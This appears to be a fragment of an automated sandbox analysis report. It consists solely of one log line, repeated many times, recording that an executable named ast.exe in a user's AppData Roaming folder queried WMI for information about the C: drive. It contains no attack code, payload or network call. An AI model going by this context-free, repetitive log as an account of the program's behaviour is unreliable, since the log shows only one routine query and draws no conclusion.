                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
